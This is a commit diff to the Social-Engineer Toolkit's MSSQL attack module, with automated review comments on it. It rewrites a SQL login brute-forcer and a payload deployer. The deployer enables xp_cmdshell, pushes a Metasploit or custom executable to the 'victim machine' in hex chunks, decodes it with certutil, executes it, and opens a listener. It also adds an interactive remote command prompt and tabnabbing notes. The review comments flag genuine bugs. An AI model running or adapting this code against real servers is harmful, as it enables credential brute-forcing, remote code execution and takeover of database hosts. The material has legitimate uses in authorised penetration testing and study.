multiple fixes to SQL attack vectors

This commit is contained in:
TrustedSec 2016-04-20 10:14:48 -04:00
parent b72d324268
commit f184928006
5 changed files with 159 additions and 159 deletions


@ -1,3 +1,19 @@
~~~~~~~~~~~~~~~~
version 7.1
~~~~~~~~~~~~~~~~
* added so you can use multiple IP addreses based on space on mssql bruter
* rewrote mssql bruter to incorporate pymssql
* rewrote delivery payload method to use certuil instead of windows debug method
* added better description around handling tabnabbing
* added better ability to handle powershell injection
* rewrote and moved off impacket to pymssql
* added import own binary for mssql deployment
* changed deployment method from old base64 conversion bypass to Matthew Graeber's certutil binary method
* added option to import new file or metasploit file for meterpreter bypass method
* added better handling around binary injection technique for binary dropper method
* added better threading within brute forcing sql accounts
~~~~~~~~~~~~~~~~
version 7.0.6
~~~~~~~~~~~~~~~~


@ -53,7 +53,7 @@ try:
choice = "1"
if choice == "1":
range = raw_input(setprompt(
["19", "21", "22"], "Enter the CIDR or single IP (ex. 192.168.1.1/24)"))
["19", "21", "22"], "Enter the CIDR, single IP, or multiple IPs seperated by space (ex. 192.168.1.1/24)"))
if choice == "2":
while 1:
range = raw_input(setprompt(
@ -90,13 +90,21 @@ try:
sql_servers = ''
print_status(
"Hunting for SQL servers.. This may take a little bit.")
if "/" in str(range):
iprange = printCIDR(range)
iprange = iprange.split(",")
for host in iprange:
sqlport = get_sql_port(host)
if sqlport != None:
sql_servers = sql_servers + host + ":" + sqlport + ","
if "/" or " " in str(range):
if "/" in str(range):
iprange = printCIDR(range)
iprange = iprange.split(",")
for host in iprange:
sqlport = get_sql_port(host)
if sqlport != None:
sql_servers = sql_servers + host + ":" + sqlport + ","
else:
range1 = range.split(" ")
for ip in range1:
sqlport = get_sql_port(ip)
if sqlport != None:
sql_servers = sql_servers + ip + ":" + sqlport + ","
else:
# use udp discovery to get the SQL server IDP through
# 1434
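Review bot: The new guard `if "/" or " " in str(range):` is always true, because `"/"` is evaluated on its own as a non-empty (truthy) string and only `" " in str(range)` is the membership test, so the UDP-discovery `else:` branch that follows can never run. It should read `if "/" in str(range) or " " in str(range):`. The single-IP case still works by accident, since `range.split(" ")` on one address yields a one-element list, which is what keeps the bug invisible in normal use. The enclosing `try:` block starts outside the hunk; `range` also shadows the builtin, though that predates this commit.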


@ -260,7 +260,7 @@ def print_error(message):
def get_version():
define_version = '7.0.6'
define_version = '7.1'
return define_version
class create_menu:
@ -892,8 +892,8 @@ def show_banner(define_version, graphic):
print(bcolors.BLUE + """
[---] The Social-Engineer Toolkit (""" + bcolors.YELLOW + """SET""" + bcolors.BLUE + """) [---]
[---] Created by:""" + bcolors.RED + """ David Kennedy """ + bcolors.BLUE + """(""" + bcolors.YELLOW + """ReL1K""" + bcolors.BLUE + """) [---]
[---] Version: """ + bcolors.RED + """%s""" % (define_version) + bcolors.BLUE + """ [---]
[---] Codename: '""" + bcolors.YELLOW + """Rememb""" + bcolors.ENDC + bcolors.BOLD + """Rance""" + bcolors.ENDC + bcolors.BLUE + """' [---]
[---] Version: """ + bcolors.RED + """%s""" % (define_version) + bcolors.BLUE + """ [---]
[---] Codename: '""" + bcolors.YELLOW + """Ride the Lightning""" + bcolors.ENDC + bcolors.BLUE + """' [---]
[---] Follow us on Twitter: """ + bcolors.PURPLE + """@TrustedSec""" + bcolors.BLUE + """ [---]
[---] Follow me on Twitter: """ + bcolors.PURPLE + """@HackingDave""" + bcolors.BLUE + """ [---]
[---] Homepage: """ + bcolors.YELLOW + """https://www.trustedsec.com""" + bcolors.BLUE + """ [---]


@ -1,6 +1,5 @@
#!/usr/bin/env python
from src.core.setcore import *
import src.core.tds as tds
import sys
import subprocess
import socket
@ -10,34 +9,21 @@ import time
import binascii
import base64
import shutil
import _mssql
#
# this is the mssql modules
#
# define the base path
definepath = definepath()
operating_system = check_os()
msf_path = meta_path()
try:
from impacket import tds
except ImportError:
if os.path.isdir("/usr/share/pyshared/impacket"):
sys.path.append("/usr/share/pyshared/impacket")
import tds
sys.path.append(definepath)
else:
print("[!] Impacket is not installed. This menu will not work.")
sys.exit()
#
# this is the brute forcer
#
def brute(ipaddr, username, port, wordlist):
# if ipaddr being passed is invalid
if ipaddr == "":
@ -65,14 +51,7 @@ def brute(ipaddr, username, port, wordlist):
ipaddr = ipaddr.split(":")
port = ipaddr[1]
ipaddr = ipaddr[0]
#target_server = _mssql.connect(ipaddr + ":" + str(port), username, passwords)
sql_server = tds.MSSQL(str(ipaddr), int(port))
# print that we were successful
sql_server.connect()
#target_server = False
target_server = sql_server.login("master", username, passwords)
target_server = _mssql.connect(ipaddr + ":" + str(port), username, passwords)
if target_server:
print_status("\nSuccessful login with username %s and password: %s" % (
username, passwords))
@ -96,30 +75,26 @@ def brute(ipaddr, username, port, wordlist):
ipaddr, username))
return False
#
# this will deploy an already prestaged executable that reads in hexadecimal and back to binary
#
def deploy_hex2binary(ipaddr, port, username, password):
mssql = tds.MSSQL(ipaddr, int(port))
mssql.connect()
mssql.login("master", username, password)
# base variable used to select payload option
choice1 = "1"
conn = _mssql.connect(ipaddr + ":" + str(port), username, password)
print_status("Enabling the xp_cmdshell stored procedure...")
mssql.sql_query(
"exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;")
try:
conn.execute_query("exec master.dbo.sp_configure 'show advanced options',1;GO;RECONFIGURE;GO;exec master.dbo.sp_configure 'xp_cmdshell', 1;GO;RECONFIGURE;GO")
except: pass
# just throw a simple command via powershell to get the output
try:
mssql.sql_query("exec master..xp_cmdshell 'powershell -Version'")
bundle = str(capture(mssql.printRows))
# remove null byte terminators from capture output
bundle = bundle.replace("\\x00", "")
# search for parameter version - standard output for powershell -Version
# command
match = re.search("parameter version", bundle)
# if we have a match we have powershell installed
if match:
print_status("Powershell was detected on the remote system.")
print("""Pick which deployment method to use. The first is PowerShell and should be used on any modern operating system. The second method will use the certutil method to convert a binary to a binary""")
choice = raw_input("Enter your choice:\n\n1.) Use PowerShell Injection (recommended)\n2.) Use Certutil binary conversion\n\nEnter your choice [1]:")
if choice == "": choice = "1"
if choice == "1":
print_status("Powershell injection was selected to deploy to the remote system (awesome).")
option_ps = input(
"Do you want to use powershell injection? [yes/no]:")
if option_ps.lower() == "" or option_ps == "y" or option_ps == "yes":
@ -127,41 +102,63 @@ def deploy_hex2binary(ipaddr, port, username, password):
print_status("Powershell delivery selected. Boom!")
else:
option = "2"
# otherwise, fall back to the older version using debug conversion via hex
else:
print_status(
"Powershell not detected, attempting Windows debug method.")
print_status("Powershell not selected, using debug method.")
option = "2"
except Exception as err:
print err
except Exception as err:
print err
# if we don't have powershell
if option == "2":
try:
module_reload(src.core.payloadgen.create_payloads)
except:
import src.core.payloadgen.create_payloads
print_status("Connection established with SQL Server...")
print_status("Converting payload to hexadecimal...")
# if we are using a SET interactive shell payload then we need to make
# the path under web_clone versus ~./set
if os.path.isfile(setdir + "/set.payload"):
web_path = (setdir + "/web_clone/")
# then we are using metasploit
if not os.path.isfile(setdir + "/set.payload"):
if operating_system == "posix":
web_path = (setdir)
# if it isn't there yet
if not os.path.isfile(setdir + "/1msf.exe"):
# move it then
subprocess.Popen("cp %s/msf.exe %s/1msf.exe" %
(setdir, setdir), shell=True).wait()
subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" %
(setdir, setdir), shell=True).wait()
subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" %
(setdir, setdir), shell=True).wait()
fileopen = open("%s/1msf.exe" % (web_path), "rb")
# give option to use msf or your own
print_status("You can either select to use a default Metasploit payload here or import your own in order to deliver to the system. Note that if you select your own, you will need to create your own listener at the end in order to capture this.")
choice1 = raw_input("\n\n1.) Use Metasploit (default)\n2.) Select your own\n\nEnter your choice[1]:")
if choice1 == "": choice1 = "1"
if choice1 == "2":
filename = raw_input("Enter the path to your file you want to deploy to the system (ex /root/blah.exe):")
if os.path.isfile(filename):
fileopen = open(filename, "rb")
else:
print_error("File not found! Try again.")
filename = raw_input("Enter the path to your file you want to deploy to the system (ex /root/blah.exe):")
if os.path.isfile(filename):
fileopen = open(filename, "rb")
else:
print_error("Computers are hard. Find the path and try again. Defaulting to Metasploit payload.")
choice1 = "1"
if choice1 == "1":
try:
module_reload(src.core.payloadgen.create_payloads)
except:
import src.core.payloadgen.create_payloads
# if we are using a SET interactive shell payload then we need to make
# the path under web_clone versus ~./set
if os.path.isfile(setdir + "/set.payload"):
web_path = (setdir + "/web_clone/")
# then we are using metasploit
if not os.path.isfile(setdir + "/set.payload"):
if operating_system == "posix":
web_path = (setdir)
# if it isn't there yet
if not os.path.isfile(setdir + "/1msf.exe"):
# move it then
subprocess.Popen("cp %s/msf.exe %s/1msf.exe" %
(setdir, setdir), shell=True).wait()
subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" %
(setdir, setdir), shell=True).wait()
subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" %
(setdir, setdir), shell=True).wait()
if choice1 == "1":
fileopen = open("%s/1msf.exe" % (web_path), "rb")
# read in the binary
data = fileopen.read()
# convert the binary to hex
@ -171,17 +168,17 @@ def deploy_hex2binary(ipaddr, port, username, password):
filewrite.write(data)
filewrite.close()
# if we are using metasploit, start the listener
if not os.path.isfile(setdir + "/set.payload"):
if operating_system == "posix":
try:
module_reload(pexpect)
except:
import pexpect
print_status("Starting the Metasploit listener...")
msf_path = meta_path()
child2 = pexpect.spawn(
"%smsfconsole -r %s/meta_config\r\n\r\n" % (meta_path(), setdir))
if choice1 == "1":
# if we are using metasploit, start the listener
if not os.path.isfile(setdir + "/set.payload"):
if operating_system == "posix":
try:
module_reload(pexpect)
except:
import pexpect
print_status("Starting the Metasploit listener...")
msf_path = meta_path()
child2 = pexpect.spawn("%smsfconsole -r %s/meta_config\r\n\r\n" % (meta_path(), setdir))
# random executable name
random_exe = generate_random_string(10, 15)
@ -189,7 +186,6 @@ def deploy_hex2binary(ipaddr, port, username, password):
#
# next we deploy our hex to binary if we selected option 1 (powershell)
#
if option == "1":
print_status(
"Using universal powershell x86 process downgrade attack..")
@ -263,71 +259,46 @@ def deploy_hex2binary(ipaddr, port, username, password):
#
if option == "2":
# we selected hex to binary
fileopen = open("src/payloads/hex2binary.payload", "r")
# specify random filename for deployment
print_status("Deploying initial debug stager to the system.")
random_file = generate_random_string(10, 15)
for line in fileopen:
# remove bogus chars
line = line.rstrip()
# make it printer friendly to screen
print_line = line.replace("echo e", "")
print_status("Deploying stager payload (hex): " +
bcolors.BOLD + str(print_line) + bcolors.ENDC)
mssql.sql_query("exec master..xp_cmdshell '%s>> %s'" %
(line, random_file))
print_status("Converting the stager to a binary...")
# here we convert it to a binary
mssql.sql_query("exec master..xp_cmdshell 'debug<%s'" % (random_file))
print_status("Conversion complete. Cleaning up...")
# delete the random file
mssql.sql_query("exec master..xp_cmdshell 'del %s'" % (random_file))
# here we start the conversion and execute the payload
print_status(
"Sending the main payload via to be converted back to a binary.")
print_status("Sending the main payload via to be converted back to a binary.")
# read in the file 900 bytes at a time
fileopen = open(setdir + "/payload.hex", "r")
print_status("Dropping inital begin certificate header...")
conn.execute_query("exec master ..xp_cmdshell 'echo -----BEGIN CERTIFICATE----- > %s.crt'" % (random_exe))
while fileopen:
data = fileopen.read(900).rstrip()
# if data is done then break out of loop because file is over
if data == "":
break
print_status("Deploying payload to victim machine (hex): " +
bcolors.BOLD + str(data) + bcolors.ENDC + "\n")
mssql.sql_query(
"exec master..xp_cmdshell 'echo %s>> %s'" % (data, random_exe))
print_status(
"Delivery complete. Converting hex back to binary format.")
mssql.sql_query(
"exec master..xp_cmdshell 'rename MOO.bin %s.exe'" % (random_file))
mssql.sql_query("exec master..xp_cmdshell '%s %s'" %
(random_file, random_exe))
# clean up the old files
print_status("Cleaning up old files..")
mssql.sql_query("exec master..xp_cmdshell 'del %s'" % (random_exe))
print_status("Deploying payload to victim machine (hex): " + bcolors.BOLD + str(data) + bcolors.ENDC + "\n")
conn.execute_query("exec master..xp_cmdshell 'echo %s >> %s.crt'" % (data, random_exe))
print_status("Delivery complete. Converting hex back to binary format.")
print_status("Dropping end header for binary format converstion...")
conn.execute_query("exec master ..xp_cmdshell 'echo -----END CERTIFICATE----- >> %s.crt'" % (random_exe))
print_status("Converting hex binary back to hex using certutil - Matthew Graeber man crush enabled.")
conn.execute_query("exec master..xp_cmdshell 'certutil -decode %s.crt %s.exe'" % (random_exe, random_exe))
print_status("Executing the payload - magic has happened and now its time for that moment.. You know. When you celebrate. Salute to you ninja - you deserve it.")
conn.execute_query("exec master..xp_cmdshell '%s.exe'" % (random_exe))
# if we are using SET payload
if os.path.isfile(setdir + "/set.payload"):
print_status("Spawning seperate child process for listener...")
try:
shutil.copyfile(setdir + "/web_clone/x", definepath)
except:
pass
if choice1 == "1":
if os.path.isfile(setdir + "/set.payload"):
print_status("Spawning seperate child process for listener...")
try:
shutil.copyfile(setdir + "/web_clone/x", definepath)
except:
pass
# start a threaded webserver in the background
subprocess.Popen(
"python src/html/fasttrack_http_server.py", shell=True)
# grab the port options
# start a threaded webserver in the background
subprocess.Popen("python src/html/fasttrack_http_server.py", shell=True)
# grab the port options
if check_options("PORT=") != 0:
port = check_options("PORT=")
if check_options("PORT=") != 0:
port = check_options("PORT=")
# if for some reason the port didnt get created we default to 443
else:
port = "443"
# if for some reason the port didnt get created we default to 443
else:
port = "443"
# thread is needed here due to the connect not always terminating thread,
# it hangs if thread isnt specified
@ -341,29 +312,33 @@ def deploy_hex2binary(ipaddr, port, username, password):
if option == "1":
print_status("Triggering the powershell injection payload... ")
sql_command = ("exec master..xp_cmdshell '%s'" % (powershell_command))
#mssql.sql_query("exec master..xp_cmdshell '%s'" % (powershell_command))
thread.start_new_thread(mssql.sql_query, (sql_command,))
thread.start_new_thread(conn.execute_query, (sql_command,))
# using the old method
if option == "2":
print_status("Triggering payload stager...")
sql_command = ("xp_cmdshell '%s'" % (random_exe))
alphainject = ""
if os.path.isfile(setdir + "meterpreter.alpha"):
alphainject = fileopen(setdir + "meterpreter.alpha", "r").read()
sql_command = ("xp_cmdshell '%s.exe %s'" % (random_exe, alphainject))
# start thread of SQL command that executes payload
thread.start_new_thread(mssql.sql_query, (sql_command,))
thread.start_new_thread(conn.execute_query, (sql_command,))
time.sleep(1)
# if pexpect doesnt exit right then it freaks out
if os.path.isfile(setdir + "/set.payload"):
os.system("python ../../payloads/set_payloads/listener.py")
try:
# interact with the child process through pexpect
child2.interact()
# if pexpect doesnt exit right then it freaks out
if choice1 == "1":
if os.path.isfile(setdir + "/set.payload"):
os.system("python ../../payloads/set_payloads/listener.py")
try:
os.remove("x")
# interact with the child process through pexpect
child2.interact()
try:
os.remove("x")
except:
pass
except:
pass
except:
pass
#
@ -371,18 +346,17 @@ def deploy_hex2binary(ipaddr, port, username, password):
#
def cmdshell(ipaddr, port, username, password, option):
# connect to SQL server
import src.core.tds as tds
mssql = tds.MSSQL(ipaddr, int(port))
mssql.connect()
mssql.login("master", username, password)
print_status("Connection established with SQL Server...")
print_status("Attempting to re-enable xp_cmdshell if disabled...")
try:
mssql.sql_query(
"exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;")
mssql.sql_query("exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;")
except Exception as e:
pass
print_status(
"Enter your Windows Shell commands in the xp_cmdshell - prompt...")
print_status("Enter your Windows Shell commands in the xp_cmdshell - prompt...")
while 1:
# prompt mssql
cmd = input("mssql>")
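Review bot: `alphainject = fileopen(setdir + "meterpreter.alpha", "r").read()` in the `option == "2"` branch of `deploy_hex2binary` calls `fileopen`, which at that point is the local file object bound by `fileopen = open(setdir + "/payload.hex", "r")` earlier in the function, not a function, so the line raises `TypeError` whenever the `os.path.isfile` guard above it is true; the intent is `open(...)`. That guard also joins `setdir` and `"meterpreter.alpha"` without the `/` separator every other `setdir` path in the file uses, so the check currently never matches and the error stays hidden. Suggested lines: `if os.path.isfile(setdir + "/meterpreter.alpha"):` followed by `alphainject = open(setdir + "/meterpreter.alpha", "r").read()`. Separately, the bare `except: pass` right after the first `conn.execute_query(...)` in `deploy_hex2binary` swallows any error from that configuration batch, so a failure only surfaces later with a less informative message, and `print err` (twice in the same function) is Python-2 statement syntax where the rest of the file uses `print(...)`.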


@ -610,6 +610,8 @@ for line in fileopen:
line = line.rstrip()
if line == 'tabnabbing':
print(bcolors.RED + "\n[*] Tabnabbing Attack Vector is Enabled...Victim needs to switch tabs.")
print("You may need to copy /var/www/* into /var/www/html depending on where your directory structure is.")
raw_input("Press {return} if you understand what we're saying here.")
if line == 'webjacking':
print(bcolors.RED + "\n[*] Web Jacking Attack Vector is Enabled...Victim needs to click the link.")